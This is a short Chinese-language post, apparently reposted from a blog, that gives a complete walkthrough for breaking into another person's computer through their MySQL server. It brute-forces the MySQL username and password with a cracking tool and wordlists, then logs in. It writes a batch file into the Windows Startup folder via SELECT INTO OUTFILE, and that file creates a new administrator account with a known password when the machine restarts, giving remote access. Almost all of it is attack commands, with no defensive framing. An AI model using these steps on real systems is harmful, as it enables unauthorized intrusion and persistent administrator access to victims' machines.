本文共 852 字,大约阅读时间需要 2 分钟。
1.用mysql_pwd_crack.exe工具扫描对方mysql的用户名和密码mysql_pwd_crack.exe 192.168.1.14 -x 3306 -a字典文件分别命名为:user.dic pass.dic 2.登陆对方的mysql(假设已经扫出用户名为为abc、密码为abc)
mysql -h 192.168.1.14 -u abc -p
3.创建数据库
create database aaa;4.进入数据库
use aaa;5.在数据库aaa中创建表bbb,字段名为ccc
create table bbb(ccc text);6.在表中插入批处理文件代码
insert into bbb values(“@echo off”); insert into bbb values(“net user li 123456 /add”); insert into bbb values(“net user li /active:yes”); insert into bbb values(“net localgroup Administrators li /add”);7.将批处理文件中的代码查询出来,并以批处理文件hacker.bat的格式保存在C:\\Documents and Settings\\Administrator\\「开始」菜单 \\程序\\启动\\目录下
SELECT * INTO OUTFILE 'C:\\Documents and Settings\\Administrator\\「开始」菜单\\程序\\启动\\hacker.bat' FIELDS TERMINATED BY ' ' ENCLOSED BY ' ' ESCAPED BY ' ' LINES TERMINATED BY '\n' FROM bbb;测试结果:当对方重启计算机时,会发现他的计算机系统中会自动生成一个有管理员权限的用户li,并且用它可以远程登陆他的计算机。
转载地址:http://erjpi.baihongyu.com/